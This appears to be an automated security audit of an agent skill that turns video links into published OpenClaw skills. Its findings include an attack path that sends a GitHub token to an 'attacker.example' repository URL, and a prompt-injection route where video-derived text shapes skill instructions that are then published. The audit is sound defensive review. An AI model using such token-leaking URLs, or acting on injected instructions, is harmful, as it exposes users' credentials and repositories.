Back to skill

Security audit

Youtube To Skill

Security checks for vulnerabilities and agentic risk

Overview

This skill does what it says at a high level, but it can send video-derived content to MiniMax and publish generated agent instructions to GitHub with weak review and credential controls.

Install only if you are comfortable sending video URLs, transcripts, summaries, and generated content to MiniMax and publishing the resulting skill to GitHub. Use a narrowly scoped GitHub token, do not pass untrusted repository URLs, review generated SKILL.md files before pushing, and avoid running the automatic yt-dlp install path.

Vulnerability Patterns
  • Skill Instruction HijackingAlters the agent's session goals or safety constraints when the skill loads
  • Insecure DependenciesIntroduces malicious components through unsafe dependency sources
  • Insecure Skill Coding PracticesFinds exploitable flaws such as hardcoded secrets or command injection
  • Agent Memory PoisoningWrites attacker-controlled rules into memory that affect later sessions
  • Remote Payload Retrieval and ExecutionFetches external code whose behavior can change after review
Findings (5)

T09 · Insecure Skill Coding Practices

Error
Location
scripts/git_push.sh:6
Finding

GitHub Token Disclosure Through a Caller-Controlled Repository URL

Content
View full analysis
&1 || { ``` ### Technical Analysis The repository URL is accepted as a command-line argument without validating its scheme, hostname, owner, or repository. If `GITHUB_TOKEN` is present, the script embeds it in the URL regardless of the destination host. Consequently, an attacker who can control the second argument can direct the clone operation to an attacker-controlled HTTPS server. Git will then send a request containing the token as URL user information. The token is also exposed in the `git clone` process arguments and stored in the cloned repository's `origin` URL. The script only removes the temporary clone after a successful push. Because `set -e` is active, failures after cloning can leave the repository and its credential-bearing Git configuration under `/tmp`. ### Attack Path 1. The attacker causes the script to run with a repository URL such as `https://attacker.example/repository.git`. 2. A valid `GITHUB_TOKEN` is present in the execution environment. 3. The script constructs `https://${GITHUB_TOKEN}@attacker.example/repository.git`. 4. `git clone` connects to the attacker-controlled server and transmits a request containing the credential. 5. The attacker extracts the token from server-side request data. 6. The attacker uses the token against GitHub within its granted scopes. ### Impact Assessment Succ ...[truncated 477 chars]
Remediation
View remediation

T01 · Skill Instruction Hijacking

Error
Location
scripts/extract_skill.sh:25
Finding

Untrusted Video Content Can Influence and Publish Executable Skill Instructions

Content
View full analysis
"$OUTPUT_FILE" elif echo "$SKILL_CONTENT" | grep -q '```'; then echo "$SKILL_CONTENT" | sed -n '/```/,/```/p' | sed '1d;$d' > "$OUTPUT_FILE" else echo "$SKILL_CONTENT" > "$OUTPUT_FILE" fi ``` ```bash mkdir -p "$GITHUB_REPO_DIR/skills/$SKILL_NAME" cp "$SKILL_FILE" "$GITHUB_REPO_DIR/skills/$SKILL_NAME/SKILL.md" git config user.email "bot@openclaw.ai" 2>/dev/null || true git config user.name "OpenClaw Bot" 2>/dev/null || true git add . git commit -m "Add/Update skill: $SKILL_NAME (from YouTube)" || { echo "Nothing to commit (skill already exists with same content)" echo "GITHUB_LINK=https://github.com/eeyan2025-art/skillhub/tree/main/skills/$SKILL_NAME" exit 0 } git ...[truncated 2123 chars]
Remediation
View remediation

T09 · Insecure Skill Coding Practices

Warning
Location
scripts/git_push.sh:24
Finding

Path Traversal Through an Unvalidated Generated Skill Name

Content
View full analysis
Remediation
View remediation

T08 · Insecure Dependencies

Warning
Location
scripts/download_audio.sh:14
Finding

Unpinned Runtime Installation of yt-dlp

Content
View full analysis
/dev/null; then yt-dlp \ -x \ --audio-format mp3 \ --audio-quality 0 \ -o "$OUTPUT_FILE" \ "$VIDEO_URL" else echo "ERROR: yt-dlp is not installed" echo "Installing yt-dlp..." pip install yt-dlp -q yt-dlp \ -x \ --audio-format mp3 \ --audio-quality 0 \ -o "$OUTPUT_FILE" \ "$VIDEO_URL" fi ``` ### Technical Analysis When `yt-dlp` is unavailable, the script automatically installs the latest package resolved by the active `pip` configuration. No exact version, package hash, trusted index, virtual environment, or integrity verification is specified. The package selected at runtime can therefore differ from the code that was reviewed. A compromised package release, compromised package index, malicious package mirror, or attacker-controlled pip configuration could cause untrusted code to be installed and subsequently executed. The use of the generic `pip` and `yt-dlp` commands also relies on the process `PATH`, which may resolve to binaries different from those expected by the project. ### Attack Path 1. The script runs in an environment where `yt-dlp` is absent. 2. An attacker compromises or controls the configured pip index, pip configuration, package resolution environment, or executable search path. 3. The fallback invokes `pip install yt-dlp -q`. 4. An unreviewed or attacker-controlled package is installed. 5. The script invokes `yt-dlp`, executing the installed code with the privileges of the script's account. ### Impact Assessment A malicious dependency can execute arbitrary code with the operating-system privileges of the Agent or user running the script. It can access files, environment variables such as API or GitHub tokens, network resources, and any re ...[truncated 206 chars]
Remediation
View remediation

T09 · Insecure Skill Coding Practices

Warning
Location
scripts/transcribe_and_summarize.sh:6
Finding

Predictable Temporary Paths Allow Symlink-Based File Clobbering

Content
View full analysis
"$TRANSCRIPT_FILE" ``` ```bash echo "$SUMMARY" > "$SUMMARY_FILE" ``` ```bash echo "$SKILL_CONTENT" > "$OUTPUT_FILE" ``` ### Technical Analysis The scripts use fixed, predictable names in the globally writable `/tmp` directory. They do not create a private temporary directory, use exclusive file creation, inspect for symbolic links, or verify file ownership before writing. On systems where another local user or process can create entries under `/tmp`, an attacker can pre-create one of these paths as a symbolic link to another file writable by the victim account. Shell redirection follows the symbolic link and truncates or replaces the target. The exact consequences depend on the permissions of the account running the Skill. This is a local attack and does not independently bypass filesystem permissions. ### Attack Path 1. The attacker predicts that the Skill will use a default path such as `/tmp/video_summary.md`. 2. Before execution, the attacker creates a symbolic link from that path to a target file writable by the victim account. 3. The victim runs the Skill using the default out ...[truncated 629 chars]
Remediation
View remediation
Vulnerability Patterns
  • Prompt InjectionInstruction Override, Hidden Instructions, Exfiltration Commands
  • Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
  • Excessive AgencyUnrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • Rogue AgentSelf-Modification, Session Persistence
  • Trigger AbuseOverly Broad Trigger, Shadow Command Trigger, Keyword Baiting Trigger
Findings (32)

Tp4

High
Category
MCP Tool Poisoning
Confidence
98% confidence
Finding

The declared purpose describes an end-to-end workflow: taking shared video links from multiple platforms, converting their content into an OpenClaw Skill, and uploading that Skill to GitHub. The supplied code chunk does none of those core tasks. It only downloads audio from a provided video URL and saves it as an MP3, using yt-dlp as a fallback-installed dependency. Audio downloading could be a supporting sub-step in a larger pipeline, but by itself it materially under-implements the stated primary purpose and introduces undeclared behavior (installing a package). Therefore the description does not accurately represent this code chunk.

Content

No source excerpt is available for this finding.

Tp4

High
Category
MCP Tool Poisoning
Confidence
95% confidence
Finding

The declared description promises an end-to-end pipeline: accept arbitrary video links from multiple platforms, convert their content into an OpenClaw Skill, and upload the result to GitHub. The provided code chunk only implements a narrower step: generating skill markdown from an already-prepared summary file using an LLM API. While this may be one internal stage of such a workflow, the chunk itself does not perform the core user-facing capabilities described, especially link ingestion and GitHub upload. Therefore the description does not accurately represent this code chunk's actual behavior.

Content

No source excerpt is available for this finding.

Tp4

High
Category
MCP Tool Poisoning
Confidence
98% confidence
Finding

The declared description says the skill converts arbitrary video links into an OpenClaw Skill and uploads that result to GitHub. The provided code does something much narrower and materially different: it posts the supplied video URL to MiniMax's video subtitle endpoint, retrieves subtitle text in SRT format, and saves it locally. There is no logic for creating any Skill artifact, no repository operations, no GitHub API usage, and no upload behavior. While subtitle extraction could be a supporting step in a larger video-to-skill workflow, this code chunk by itself is not accurately represented by the declared purpose.

Content

No source excerpt is available for this finding.

Tp4

High
Category
MCP Tool Poisoning
Confidence
94% confidence
Finding

The declared purpose describes an end-to-end workflow: accepting arbitrary video URLs, converting video content into an OpenClaw Skill, and uploading the result to GitHub. The supplied code chunk implements only the GitHub upload portion. It neither accepts nor validates video links, nor downloads, transcribes, analyzes, or transforms video content into a skill. Its primary behavior is repository manipulation and git push using an existing SKILL.md file. That is a materially narrower and different behavior than the declared description, so this is a mismatch.

Content

No source excerpt is available for this finding.

Tp4

High
Category
MCP Tool Poisoning
Confidence
98% confidence
Finding

The declared description says the skill automatically converts arbitrary video links into an OpenClaw Skill and uploads it to GitHub. The supplied code does none of that. It only takes an existing local subtitle or audio file, calls MiniMax APIs to transcribe and summarize the content, and saves transcript/summary files locally. There is no logic for downloading videos from platforms like YouTube/Bilibili/Douyin, no parsing of URLs, no OpenClaw Skill generation, and no GitHub interaction. This is a clear description-behavior mismatch with a materially different primary purpose.

Content

No source excerpt is available for this finding.

Missing User Warnings

High
Category
Not specified by scanner
Confidence
97% confidence
Finding

The skill states that it will convert video content and push the result to GitHub, but it does not provide a clear up-front warning to the user that generated content may be published externally. This creates a substantial risk of unintended disclosure of sensitive, copyrighted, private, or embarrassing content through automatic repository writes.

Content

No source excerpt is available for this finding.

Self-Modification

High
Category
Rogue Agent
Confidence
85% confidence
Finding

Skill modifies its own code, configuration, or behavior at runtime. Self-modification enables an agent to escalate privileges, disable safety constraints, or install persistent backdoors.

Content

Scanner excerpt · scripts/git_push.sh (reported line 64)May include surrounding context.

sh
git config user.name "OpenClaw Bot" 2>/dev/null || true

git add .
git commit -m "Add/Update skill: $SKILL_NAME (from YouTube)" || {
  echo "Nothing to commit (skill already exists with same content)"
  echo "GITHUB_LINK=https://github.com/eeyan2025-art/skillhub/tree/main/skills/$SKILL_NAME"
  exit 0

Undeclared Tool Scope

Medium
Category
MCP Least Privilege
Confidence
95% confidence
Finding

The skill includes shell-based capabilities and a Git workflow that can clone, copy, commit, and push content, but it declares no explicit tool restrictions or permissions. This makes the operational scope opaque and increases the risk of unintended command execution or repository modification if the skill is triggered in a broader-than-expected context.

Content

No source excerpt is available for this finding.

Vague Triggers

Medium
Category
Not specified by scanner
Confidence
95% confidence
Finding

The trigger description is broad enough to activate on common user behavior such as sharing any video link, which can cause the skill to run in unintended situations. Because the workflow can send content to external services and eventually publish generated output to GitHub, an overbroad trigger increases the chance of accidental data processing and unintended repository changes.

Content

No source excerpt is available for this finding.

Missing User Warnings

Medium
Category
Not specified by scanner
Confidence
95% confidence
Finding

The workflow sends extracted subtitles, transcripts, audio URLs, or derived content to external services for transcription and summarization without clearly warning the user. This can expose third-party or sensitive content to external processors, creating privacy, compliance, and data-handling risks.

Content

No source excerpt is available for this finding.

Natural-Language Policy Violations

Medium
Category
Not specified by scanner
Confidence
98% confidence
Finding

The prompt explicitly requires '用中文输出', which imposes a fixed language choice. There is no indication that the user can opt into another language or that Chinese-only output is required for a documented regional purpose, so this is a language policy concern.

Content

No source excerpt is available for this finding.

Context-Inappropriate Capability

Medium
Category
Not specified by scanner
Confidence
94% confidence
Finding

The script performs an unpinned runtime installation of yt-dlp via pip when the binary is absent, which introduces supply-chain and execution risk during normal skill operation. Because this skill processes arbitrary user-supplied video URLs, silently fetching and executing a package at runtime expands the attack surface and weakens reproducibility and trust boundaries.

Content

No source excerpt is available for this finding.

External Transmission

Medium
Category
Data Exfiltration
Confidence
90% confidence
Finding

The script performs an external network transmission to the MiniMax API and includes user-provided summary content in the request body. In a workflow that processes arbitrary video content, this can leak sensitive or copyrighted material to a third party if users are unaware of the transfer.

Content

Scanner excerpt · scripts/extract_skill.sh (reported line 29)May include surrounding context.

sh
echo "Extracting Skill from summary..."

RESPONSE=$(curl -s -X POST "https://api.minimax.chat/v1/chat/completions" \
  -H "Authorization: Bearer $MINIMAX_API_KEY" \
  -H "Content-Type: application/json" \
  -d "$(jq -n \

External Transmission

Medium
Category
Data Exfiltration
Confidence
90% confidence
Finding

The script performs an external network transmission to the MiniMax API and includes user-provided summary content in the request body. In a workflow that processes arbitrary video content, this can leak sensitive or copyrighted material to a third party if users are unaware of the transfer.

Content

Scanner excerpt · scripts/extract_skill.sh (reported line 29)May include surrounding context.

sh
echo "Extracting Skill from summary..."

RESPONSE=$(curl -s -X POST "https://api.minimax.chat/v1/chat/completions" \
  -H "Authorization: Bearer $MINIMAX_API_KEY" \
  -H "Content-Type: application/json" \
  -d "$(jq -n \

Missing User Warnings

Medium
Category
Not specified by scanner
Confidence
93% confidence
Finding

The script sends the full video-derived summary content to a third-party LLM service without any explicit notice, consent gate, or redaction step. If summaries contain sensitive, proprietary, or personal data extracted from the source video, this creates an unintended data disclosure channel outside the local environment.

Content

No source excerpt is available for this finding.

Ssd 4

Medium
Category
Not specified by scanner
Confidence
95% confidence
Finding

Untrusted summary text is inserted verbatim into the LLM prompt, allowing prompt injection in the summary to steer the model away from the intended task or produce malicious skill content. In this skill's context, the generated output is a downstream artifact intended for reuse and possible publication, so poisoned instructions in video-derived text can propagate into generated SKILL.md content.

Content

No source excerpt is available for this finding.

External Transmission

Medium
Category
Data Exfiltration
Confidence
90% confidence
Finding

The hardcoded external endpoint confirms that the skill depends on a third-party network service, which expands the trust boundary and exposes submitted video URLs and usage patterns outside the local environment. In a skill that processes arbitrary shared links from many platforms, this is more dangerous because users may submit private, unlisted, or otherwise sensitive URLs that are then disclosed upstream.

Content

Scanner excerpt · scripts/extract_subtitle.sh (reported line 22)May include surrounding context.

sh
echo "Extracting subtitle from: $VIDEO_URL"

RESPONSE=$(curl -s -X POST "https://api.minimax.chat/v1/video/subtitle" \
  -H "Authorization: Bearer $MINIMAX_API_KEY" \
  -H "Content-Type: application/json" \
  -d "$(jq -n --arg url "$VIDEO_URL" '{"video_url": $url, "format": "srt"}')")

External Transmission

Medium
Category
Data Exfiltration
Confidence
90% confidence
Finding

The hardcoded external endpoint confirms that the skill depends on a third-party network service, which expands the trust boundary and exposes submitted video URLs and usage patterns outside the local environment. In a skill that processes arbitrary shared links from many platforms, this is more dangerous because users may submit private, unlisted, or otherwise sensitive URLs that are then disclosed upstream.

Content

Scanner excerpt · scripts/extract_subtitle.sh (reported line 22)May include surrounding context.

sh
echo "Extracting subtitle from: $VIDEO_URL"

RESPONSE=$(curl -s -X POST "https://api.minimax.chat/v1/video/subtitle" \
  -H "Authorization: Bearer $MINIMAX_API_KEY" \
  -H "Content-Type: application/json" \
  -d "$(jq -n --arg url "$VIDEO_URL" '{"video_url": $url, "format": "srt"}')")

Missing User Warnings

Medium
Category
Not specified by scanner
Confidence
93% confidence
Finding

The script sends a user-supplied video URL to a third-party API and authenticates that request with a bearer token, but it provides no meaningful consent, disclosure, allowlist validation, or privacy guardrails. In this skill context, users may assume the tool locally processes public video links, while it actually transmits input to an external service that can log URLs and associated metadata, creating a real data exposure and trust-boundary issue.

Content

No source excerpt is available for this finding.

Context-Inappropriate Capability

Medium
Category
Not specified by scanner
Confidence
87% confidence
Finding

The script consumes a GitHub token from the environment and injects it into an authenticated clone URL, enabling repository write access. While this matches the stated behavior of uploading generated skills to GitHub, it still creates credential-handling and secret-exposure risk because tokens may leak via process listings, logs, shell history, or error output if mishandled.

Content

No source excerpt is available for this finding.

Missing User Warnings

Medium
Category
Not specified by scanner
Confidence
93% confidence
Finding

The script unconditionally runs rm -rf on the repository directory before proceeding, which is a destructive filesystem operation. Although the path is intended to be temporary, there is no confirmation prompt or explicit warning to the user about the deletion behavior.

Content

No source excerpt is available for this finding.

Missing User Warnings

Medium
Category
Not specified by scanner
Confidence
90% confidence
Finding

The script transmits local content to a remote GitHub repository with git push, which is an external network side effect and can publish data without an explicit confirmation step. In this skill's context, publishing is the intended function, but the lack of an explicit prompt or dry-run mode increases the risk of accidental exfiltration, overwriting, or disclosure to the wrong repository/branch.

Content

No source excerpt is available for this finding.

External Transmission

Medium
Category
Data Exfiltration
Confidence
92% confidence
Finding

The hardcoded external endpoint indicates that the skill is designed to send content to a third-party service outside the local environment. In this context that behavior is security-relevant because the skill processes arbitrary media content and does not show any trust boundary checks, consent prompts, or compliance controls before transmission.

Content

Scanner excerpt · scripts/transcribe_and_summarize.sh (reported line 36)May include surrounding context.

sh
CONTENT=$(cat "$INPUT_FILE")
  
  # 调用 MiniMax LLM 生成摘要和文字稿
  RESPONSE=$(curl -s -X POST "https://api.minimax.chat/v1/chat/completions" \
    -H "Authorization: Bearer $MINIMAX_API_KEY" \
    -H "Content-Type: application/json" \
    -d "$(jq -n \

External Transmission

Medium
Category
Data Exfiltration
Confidence
92% confidence
Finding

The hardcoded external endpoint indicates that the skill is designed to send content to a third-party service outside the local environment. In this context that behavior is security-relevant because the skill processes arbitrary media content and does not show any trust boundary checks, consent prompts, or compliance controls before transmission.

Content

Scanner excerpt · scripts/transcribe_and_summarize.sh (reported line 36)May include surrounding context.

sh
CONTENT=$(cat "$INPUT_FILE")
  
  # 调用 MiniMax LLM 生成摘要和文字稿
  RESPONSE=$(curl -s -X POST "https://api.minimax.chat/v1/chat/completions" \
    -H "Authorization: Bearer $MINIMAX_API_KEY" \
    -H "Content-Type: application/json" \
    -d "$(jq -n \

Missing User Warnings

Medium
Category
Not specified by scanner
Confidence
95% confidence
Finding

The script sends the full subtitle content or transcript derived from user-provided media to a third-party MiniMax API, but there is no visible consent flow, warning, redaction step, or policy enforcement before transmission. This creates a real confidentiality and privacy risk because uploaded media may contain personal, proprietary, or regulated information that is disclosed externally by default.

Content

No source excerpt is available for this finding.

Static analysis

No suspicious patterns detected.